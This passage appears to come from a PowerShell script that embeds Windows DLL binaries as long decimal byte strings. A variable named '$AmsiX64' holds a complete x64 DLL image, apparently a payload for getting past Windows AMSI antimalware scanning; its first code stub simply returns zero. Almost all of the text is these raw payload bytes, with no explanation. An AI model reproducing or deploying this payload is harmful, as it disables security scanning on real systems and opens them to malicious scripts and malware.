226 38 0 0 0 0 0 0 184 37 0 0 84 37 0 0 152 37 0 0 118 37 0 0 194 37 0 0 0 0 0 0 154 38 0 0 140 38 0 0 116 38 0 0 88 38 0 0 60 38 0 0 26 38 0 0 8 38 0 0 250 37 0 0 238 37 0 0 0 0 0 0 40 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 105 110 118 111 107 101 95 116 114 105 103 103 101 114 0 41 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 114 101 116 117 114 110 95 116 114 105 103 103 101 114 0 37 0 95 95 115 116 100 95 116 121 112 101 95 105 110 102 111 95 100 101 115 116 114 111 121 95 108 105 115 116 0 0 72 0 109 101 109 115 101 116 0 0 53 0 95 101 120 99 101 112 116 95 104 97 110 100 108 101 114 52 95 99 111 
109 109 111 110 0 86 67 82 85 78 84 73 77 69 49 52 48 46 100 108 108 0 0 56 0 95 105 110 105 116 116 101 114 109 0 57 0 95 105 110 105 116 116 101 114 109 95 101 0 65 0 95 115 101 104 95 102 105 108 116 101 114 95 100 108 108 0 53 0 95 105 110 105 116 105 97 108 105 122 101 95 110 97 114 114 111 119 95 101 110 118 105 114 111 110 109 101 110 116 0 0 54 0 95 105 110 105 116 105 97 108 105 122 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 0 62 0 95 114 101 103 105 115 116 101 114 95 111 110 101 120 105 116 95 102 117 110 99 116 105 111 110 0 36 0 95 101 120 101 99 117 116 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 31 0 95 99 114 116 95 97 116 101 120 105 116 0 23 0 95 99 101 120 105 116 0 0 97 112 105 45 109 115 45 119 105 110 45 99 114 116 45 114 117 110 116 105 109 101 45 108 49 45 49 45 48 46 100 108 108 0 130 5 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 0 67 5 83 101 116 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 9 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 0 97 5 84 101 114 109 105 110 97 116 101 80 114 111 99 101 115 115 0 0 109 3 73 115 80 114 111 99 101 115 115 111 114 70 101 97 116 117 114 101 80 114 101 115 101 110 116 0 45 4 81 117 101 114 121 80 101 114 102 111 114 109 97 110 99 101 67 111 117 110 116 101 114 0 10 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 73 100 0 14 2 71 101 116 67 117 114 114 101 110 116 84 104 114 101 97 100 73 100 0 0 214 2 71 101 116 83 121 115 116 101 109 84 105 109 101 65 115 70 105 108 101 84 105 109 101 0 75 3 73 110 105 116 105 97 108 105 122 101 83 76 105 115 116 72 101 97 100 0 103 3 73 115 68 101 98 117 103 103 101 114 80 114 101 115 101 110 116 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 177 25 191 68 78 230 64 187 255 255 255 255 0 0 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 54 0 0 0 73 0 0 0 76 0 0 0 12 0 0 0 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 
0 24 0 0 0 24 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 48 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 72 0 0 0 96 80 0 0 125 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 0 12 1 0 0 7 48 108 48 155 48 171 48 194 48 211 48 228 48 233 48 2 49 7 49 20 49 97 49 126 49 136 49 150 49 168 49 189 49 251 49 212 50 7 51 85 51 94 51 105 51 112 51 144 51 150 51 156 51 162 51 168 51 174 51 181 51 188 51 195 51 202 51 209 51 216 51 223 51 231 51 239 51 247 51 3 52 12 52 17 52 23 52 33 52 43 52 59 52 75 52 91 52 100 52 201 52 121 53 170 53 249 53 12 54 31 54 43 54 59 54 76 
54 114 54 135 54 142 54 148 54 166 54 176 54 17 55 30 55 69 55 77 55 102 55 160 55 187 55 199 55 214 55 223 55 236 55 27 56 35 56 46 56 52 56 58 56 70 56 76 56 111 56 160 56 75 57 106 57 116 57 133 57 146 57 151 57 189 57 194 57 231 57 241 57 14 58 91 58 96 58 115 58 129 58 156 58 167 58 54 59 63 59 71 59 142 59 157 59 164 59 218 59 227 59 240 59 251 59 4 60 19 60 30 60 36 60 42 60 48 60 54 60 60 60 66 60 72 60 78 60 84 60 90 60 96 60 102 60 108 60 114 60 0 0 0 32 0 0 32 0 0 0 112 48 164 48 168 48 92 49 96 49 104 49 48 52 80 52 108 52 112 52 140 52 144 52 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" + $AmsiX64 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 148 172 98 253 208 205 12 174 208 205 12 174 208 205 12 174 217 181 159 174 210 205 12 174 190 150 13 175 211 205 12 174 190 150 15 175 210 205 12 174 190 150 9 175 216 205 12 174 190 150 8 175 217 205 12 174 13 50 199 174 210 205 12 174 208 205 13 174 240 205 12 174 2 150 4 175 209 205 12 174 2 150 243 174 209 205 12 174 2 150 14 175 209 205 12 174 82 105 99 104 208 205 12 174 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 100 134 7 0 136 29 62 87 0 0 0 0 0 0 0 0 240 0 34 32 11 2 14 0 0 16 0 0 0 28 0 0 0 0 0 0 160 19 0 0 0 16 0 0 0 0 0 128 1 0 0 0 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 128 0 0 0 4 0 0 0 0 0 0 2 0 96 1 
0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 108 38 0 0 80 0 0 0 0 96 0 0 224 1 0 0 0 64 0 0 176 1 0 0 0 0 0 0 0 0 0 0 0 112 0 0 24 0 0 0 112 33 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 224 33 0 0 148 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 248 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 211 14 0 0 0 16 0 0 0 16 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 128 10 0 0 0 32 0 0 0 12 0 0 0 20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 64 6 0 0 0 48 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 112 100 97 116 97 0 0 176 1 0 0 0 64 0 0 0 2 0 0 0 34 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 103 102 105 100 115 0 0 16 0 0 0 0 80 0 0 0 2 0 0 0 36 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 96 0 0 0 2 0 0 0 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 24 0 0 0 0 112 0 0 0 2 0 0 0 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 195 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 102 102 15 31 132 0 0 0 0 0 72 59 13 217 31 0 0 242 117 18 72 193 193 16 102 247 193 255 255 242 117 2 242 195 72 193 201 16 233 211 3 0 0 204 204 204 72 131 236 40 133 210 116 57 131 234 1 116 40 131 234 1 116 22 131 250 1 116 10 184 1 0 0 0 72 131 196 40 195 232 142 5 0 0 235 5 232 95 5 0 0 15 182 192 72 131 196 40 195 73 139 208 72 131 196 40 233 15 0 0 0 77 133 192 15 149 193 72 131 196 40 233 44 1 0 0 72 137 92 36 8 72 
137 116 36 16 72 137 124 36 32 65 86 72 131 236 32 72 139 242 76 139 241 51 201 232 2 6 0 0 132 192 117 7 51 192 233 232 0 0 0 232 150 4 0 0 138 216 136 68 36 64 64 183 1 131 61 234 36 0 0 0 116 10 185 7 0 0 0 232 62 9 0 0 199 5 212 36 0 0 1 0 0 0 232 199 4 0 0 132 192 116 103 232 110 10 0 0 72 141 13 179 10 0 0 232 6 8 0 0 232 197 8 0 0 72 141 13 206 8 0 0 232 245 7 0 0 232 224 8 0 0 72 141 21 253 15 0 0 72 141 13 238 15 0 0 232 213 12 0 0 133 192 117 41 232 96 4 0 0 132 192 116 32 72 141 21 205 15 0 0 72 141 13 190 15 0 0 232 175 12 0 0 199 5 103 36 0 0 2 0 0 0 64 50 255 138 203 232 9 7 0 0 64 132 255 15 133 78 255 255 255 232 167 8 0 0 72 139 216 72 131 56 0 116 36 72 139 200 232 78 6 0 0 132 192 116 24 72 139 27 72 139 203 232 111 10 0 0 76 139 198 186 2 0 0 0 73 139 206 255 211 255 5 156 30 0 0 184 1 0 0 0 72 139 92 36 48 72 139 116 36 56 72 139 124 36 72 72 131 196 32 65 94 195 204 72 137 92 36 8 72 137 116 36 24 87 72 131 236 32 64 138 241 139 5 104 30 0 0 51 219 133 192 127 4 51 192 235 80 255 200 137 5 86 30 0 0 232 109 3 0 0 64 138 248 136 68 36 56 131 61 195 35 0 0 2 116 10 185 7 0 0 0 232 23 8 0 0 232 102 4 0 0 137 29 172 35 0 0 232 139 4 0 0 64 138 207 232 75 6 0 0 51 210 64 138 206 232 101 6 0 0 132 192 15 149 195 139 195 72 139 92 36 48 72 139 116 36 64 72 131 196 32 95 195 204 204 72 139 196 72 137 88 32 76 137 64 24 137 80 16 72 137 72 8 86 87 65 86 72 131 236 64 77 139 240 139 250 72 139 241 141 66 255 131 248 1 119 46 232 217 0 0 0 139 216 137 68 36 48 133 192 15 132 179 0 0 0 77 139 198 139 215 72 139 206 232 182 253 255 255 139 216 137 68 36 48 133 192 15 132 152 0 0 0 131 255 1 117 8 72 139 206 232 55 11 0 0 77 139 198 139 215 72 139 206 232 74 253 255 255 139 216 137 68 36 48 131 255 1 117 52 133 192 117 39 77 139 198 51 210 72 139 206 232 46 253 255 255 77 139 198 51 210 72 139 206 232 101 253 255 255 77 139 198 51 210 72 139 206 232 96 0 0 0 131 255 1 117 4 133 219 116 4 133 255 117 12 72 139 206 232 229 10 0 0 133 255 116 5 131 255 3 117 
42 77 139 198 139 215 72 139 206 232 45 253 255 255 139 216 137 68 36 48 133 192 116 19 77 139 198 139 215 72 139 206 232 30 0 0 0 139 216 137 68 36 48 235 6 51 219 137 92 36 48 139 195 72 139 92 36 120 72 131 196 64 65 94 95 94 195 72 137 92 36 8 72 137 108 36 16 72 137 116 36 24 87 72 131 236 32 72 139 29 233 13 0 0 73 139 248 139 242 72 139 233 72 133 219 117 5 141 67 1 235 18 72 139 203 232 127 8 0 0 76 139 199 139 214 72 139 205 255 211 72 139 92 36 48 72 139 108 36 56 72 139 116 36 64 72 131 196 32 95 195 72 137 92 36 8 72 137 116 36 16 87 72 131 236 32 73 139 248 139 218 72 139 241 131 250 1 117 5 232 99 5 0 0 76 139 199 139 211 72 139 206 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 233 103 254 255 255 204 204 204 64 83 72 131 236 32 72 139 217 51 201 255 21 119 12 0 0 72 139 203 255 21 6 12 0 0 255 21 32 12 0 0 72 139 200 186 9 4 0 192 72 131 196 32 91 72 255 37 76 12 0 0 72 137 76 36 8 72 131 236 56 185 23 0 0 0 232 13 10 0 0 133 192 116 7 185 2 0 0 0 205 41 72 141 13 183 28 0 0 232 170 0 0 0 72 139 68 36 56 72 137 5 158 29 0 0 72 141 68 36 56 72 131 192 8 72 137 5 46 29 0 0 72 139 5 135 29 0 0 72 137 5 248 27 0 0 72 139 68 36 64 72 137 5 252 28 0 0 199 5 210 27 0 0 9 4 0 192 199 5 204 27 0 0 1 0 0 0 199 5 214 27 0 0 1 0 0 0 184 8 0 0 0 72 107 192 0 72 141 13 206 27 0 0 72 199 4 1 2 0 0 0 184 8 0 0 0 72 107 192 0 72 139 13 70 27 0 0 72 137 76 4 32 184 8 0 0 0 72 107 192 1 72 139 13 57 27 0 0 72 137 76 4 32 72 141 13 125 12 0 0 232 0 255 255 255 72 131 196 56 195 204 204 204 64 83 86 87 72 131 236 64 72 139 217 255 21 31 11 0 0 72 139 179 248 0 0 0 51 255 69 51 192 72 141 84 36 96 72 139 206 255 21 253 10 0 0 72 133 192 116 57 72 131 100 36 56 0 72 141 76 36 104 72 139 84 36 96 76 139 200 72 137 76 36 48 76 139 198 72 141 76 36 112 72 137 76 36 40 51 201 72 137 92 36 32 255 21 190 10 0 0 255 199 131 255 2 124 177 72 131 196 64 95 94 91 195 204 204 204 72 131 236 40 232 103 8 0 0 133 192 116 33 101 72 139 4 37 48 0 0 0 72 139 72 8 235 5 72 59 200 116 
20 51 192 240 72 15 177 13 64 32 0 0 117 238 50 192 72 131 196 40 195 176 1 235 247 204 204 204 72 131 236 40 232 43 8 0 0 133 192 116 7 232 94 6 0 0 235 5 232 95 8 0 0 176 1 72 131 196 40 195 72 131 236 40 51 201 232 65 1 0 0 132 192 15 149 192 72 131 196 40 195 204 204 204 72 131 236 40 232 99 8 0 0 132 192 117 4 50 192 235 18 232 86 8 0 0 132 192 117 7 232 77 8 0 0 235 236 176 1 72 131 196 40 195 72 131 236 40 232 59 8 0 0 232 54 8 0 0 176 1 72 131 196 40 195 204 204 204 72 137 92 36 8 72 137 108 36 16 72 137 116 36 24 87 72 131 236 32 73 139 249 73 139 240 139 218 72 139 233 232 152 7 0 0 133 192 117 23 131 251 1 117 18 72 139 207 232 187 5 0 0 76 139 198 51 210 72 139 205 255 215 72 139 84 36 88 139 76 36 80 72 139 92 36 48 72 139 108 36 56 72 139 116 36 64 72 131 196 32 95 233 153 7 0 0 204 204 204 72 131 236 40 232 79 7 0 0 133 192 116 16 72 141 13 72 31 0 0 72 131 196 40 233 145 7 0 0 232 106 249 255 255 133 192 117 5 232 143 7 0 0 72 131 196 40 195 72 131 236 40 51 201 232 141 7 0 0 72 131 196 40 233 132 7 0 0 64 83 72 131 236 32 15 182 5 59 31 0 0 133 201 187 1 0 0 0 15 68 195 136 5 43 31 0 0 232 46 5 0 0 232 93 7 0 0 132 192 117 4 50 192 235 20 232 80 7 0 0 132 192 117 9 51 201 232 69 7 0 0 235 234 138 195 72 131 196 32 91 195 204 204 204 72 137 92 36 8 85 72 139 236 72 131 236 64 139 217 131 249 1 15 135 166 0 0 0 232 171 6 0 0 133 192 116 43 133 219 117 39 72 141 13 160 30 0 0 232 225 6 0 0 133 192 116 4 50 192 235 122 72 141 13 164 30 0 0 232 205 6 0 0 133 192 15 148 192 235 103 72 139 21 169 24 0 0 73 131 200 255 139 194 185 64 0 0 0 131 224 63 43 200 176 1 73 211 200 76 51 194 76 137 69 224 76 137 69 232 15 16 69 224 76 137 69 240 242 15 16 77 240 15 17 5 69 30 0 0 76 137 69 224 76 137 69 232 15 16 69 224 76 137 69 240 242 15 17 13 61 30 0 0 242 15 16 77 240 15 17 5 57 30 0 0 242 15 17 13 65 30 0 0 72 139 92 36 80 72 131 196 64 93 195 185 5 0 0 0 232 84 2 0 0 204 204 204 204 72 131 236 24 76 139 193 184 77 90 0 0 102 57 5 29 232 255 255 117 124 72 
99 5 80 232 255 255 72 141 21 13 232 255 255 72 141 12 16 129 57 80 69 0 0 117 98 184 11 2 0 0 102 57 65 24 117 87 76 43 194 15 183 65 20 72 141 81 24 72 3 208 15 183 65 6 72 141 12 128 76 141 12 202 72 137 20 36 73 59 209 116 24 139 74 12 76 59 193 114 10 139 66 8 3 193 76 59 192 114 8 72 131 194 40 235 223 51 210 72 133 210 117 4 50 192 235 23 247 66 36 0 0 0 128 116 4 50 192 235 10 176 1 235 6 50 192 235 2 50 192 72 131 196 24 195 64 83 72 131 236 32 138 217 232 83 5 0 0 51 210 133 192 116 11 132 219 117 7 72 135 21 62 29 0 0 72 131 196 32 91 195 64 83 72 131 236 32 128 61 99 29 0 0 0 138 217 116 4 132 210 117 14 138 203 232 144 5 0 0 138 203 232 137 5 0 0 176 1 72 131 196 32 91 195 204 64 83 72 131 236 32 72 139 21 55 23 0 0 72 139 217 139 202 72 51 21 251 28 0 0 131 225 63 72 211 202 72 131 250 255 117 10 72 139 203 232 63 5 0 0 235 15 72 139 211 72 141 13 219 28 0 0 232 34 5 0 0 51 201 133 192 72 15 68 203 72 139 193 72 131 196 32 91 195 204 72 131 236 40 232 167 255 255 255 72 247 216 27 192 247 216 255 200 72 131 196 40 195 204 72 137 92 36 32 85 72 139 236 72 131 236 32 72 131 101 24 0 72 187 50 162 223 45 153 43 0 0 72 139 5 185 22 0 0 72 59 195 117 111 72 141 77 24 255 21 226 6 0 0 72 139 69 24 72 137 69 16 255 21 220 6 0 0 139 192 72 49 69 16 255 21 216 6 0 0 139 192 72 141 77 32 72 49 69 16 255 21 208 6 0 0 139 69 32 72 141 77 16 72 193 224 32 72 51 69 32 72 51 69 16 72 51 193 72 185 255 255 255 255 255 255 0 0 72 35 193 72 185 51 162 223 45 153 43 0 0 72 59 195 72 15 68 193 72 137 5 69 22 0 0 72 139 92 36 72 72 247 208 72 137 5 62 22 0 0 72 131 196 32 93 195 72 141 13 57 28 0 0 72 255 37 82 6 0 0 204 204 72 141 13 41 28 0 0 233 6 4 0 0 72 141 5 45 28 0 0 195 72 141 5 45 28 0 0 195 72 131 236 40 232 231 255 255 255 72 131 8 4 232 230 255 255 255 72 131 8 2 72 131 196 40 195 204 72 141 5 25 28 0 0 195 72 137 92 36 8 85 72 141 172 36 64 251 255 255 72 129 236 192 5 0 0 139 217 185 23 0 0 0 232 243 3 0 0 133 192 116 4 139 203 205 41 131 37 224 27 0 0 0 72 
141 77 240 51 210 65 184 208 4 0 0 232 151 3 0 0 72 141 77 240 255 21 173 5 0 0 72 139 157 232 0 0 0 72 141 149 216 4 0 0 72 139 203 69 51 192 255 21 139 5 0 0 72 133 192 116 60 72 131 100 36 56 0 72 141 141 224 4 0 0 72 139 149 216 4 0 0 76 139 200 72 137 76 36 48 76 139 195 72 141 141 232 4 0 0 72 137 76 36 40 72 141 77 240 72 137 76 36 32 51 201 255 21 66 5 0 0 72 139 133 200 4 0 0 72 141 76 36 80 72 137 133 232 0 0 0 51 210 72 141 133 200 4 0 0 65 184 152 0 0 0 72 131 192 8 72 137 133 136 0 0 0 232 0 3 0 0 72 139 133 200 4 0 0 72 137 68 36 96 199 68 36 80 21 0 0 64 199 68 36 84 1 0 0 0 255 21 14 5 0 0 131 248 1 72 141 68 36 80 72 137 68 36 64 72 141 69 240 15 148 195 72 137 68 36 72 51 201 255 21 45 5 0 0 72 141 76 36 64 255 21 186 4 0 0 133 192 117 10 246 219 27 192 33 5 220 26 0 0 72 139 156 36 208 5 0 0 72 129 196 192 5 0 0 93 195 204 204 204 72 137 92 36 8 72 137 116 36 16 87 72 131 236 32 72 141 29 154 9 0 0 72 141 53 147 9 0 0 235 22 72 139 59 72 133 255 116 10 72 139 207 232 105 0 0 0 255 215 72 131 195 8 72 59 222 114 229 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 195 204 204 72 137 92 36 8 72 137 116 36 16 87 72 131 236 32 72 141 29 94 9 0 0 72 141 53 87 9 0 0 235 22 72 139 59 72 133 255 116 10 72 139 207 232 29 0 0 0 255 215 72 131 195 8 72 59 222 114 229 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 195 204 204 72 255 37 241 4 0 0 204 72 137 92 36 16 85 72 139 236 72 131 236 32 131 101 232 0 51 201 51 192 199 5 245 19 0 0 2 0 0 0 15 162 68 139 193 199 5 226 19 0 0 1 0 0 0 65 129 240 110 116 101 108 68 139 202 65 129 241 105 110 101 73 68 139 210 69 11 200 139 211 129 242 71 101 110 117 68 139 216 68 11 202 184 1 0 0 0 65 15 148 192 129 241 99 65 77 68 129 243 65 117 116 104 65 129 242 101 110 116 105 65 11 218 11 217 65 15 148 194 51 201 15 162 68 139 201 137 69 240 69 132 192 68 137 77 248 68 139 5 156 25 0 0 139 200 137 93 244 137 85 252 116 82 72 131 13 118 19 0 0 255 65 131 200 4 37 240 63 255 15 68 137 5 122 25 0 0 61 192 6 1 0 116 40 
61 96 6 2 0 116 33 61 112 6 2 0 116 26 5 176 249 252 255 131 248 32 119 27 72 187 1 0 1 0 1 0 0 0 72 15 163 195 115 11 65 131 200 1 68 137 5 64 25 0 0 69 132 210 116 25 129 225 0 15 240 15 129 249 0 15 96 0 124 11 65 131 200 4 68 137 5 34 25 0 0 184 7 0 0 0 137 85 224 68 137 77 228 68 59 216 124 36 51 201 15 162 137 69 240 137 93 244 137 77 248 137 85 252 137 93 232 15 186 227 9 115 11 65 131 200 2 68 137 5 237 24 0 0 65 15 186 225 20 115 110 199 5 192 18 0 0 2 0 0 0 199 5 186 18 0 0 6 0 0 0 65 15 186 225 27 115 83 65 15 186 225 28 115 76 51 201 15 1 208 72 193 226 32 72 11 208 72 137 85 16 72 139 69 16 36 6 60 6 117 50 139 5 140 18 0 0 131 200 8 199 5 123 18 0 0 3 0 0 0 246 69 232 32 137 5 117 18 0 0 116 19 131 200 32 199 5 98 18 0 0 5 0 0 0 137 5 96 18 0 0 51 192 72 139 92 36 56 72 131 196 32 93 195 204 204 204 51 192 57 5 92 18 0 0 15 149 192 195 194 0 0 204 204 204 204 204 255 37 178 2 0 0 255 37 164 2 0 0 255 37 150 2 0 0 255 37 136 2 0 0 255 37 122 2 0 0 255 37 228 2 0 0 255 37 214 2 0 0 255 37 200 2 0 0 255 37 186 2 0 0 255 37 172 2 0 0 255 37 158 2 0 0 255 37 144 2 0 0 255 37 130 2 0 0 255 37 116 2 0 0 255 37 30 2 0 0 204 204 176 1 195 204 204 204 204 204 204 204 102 102 15 31 132 0 0 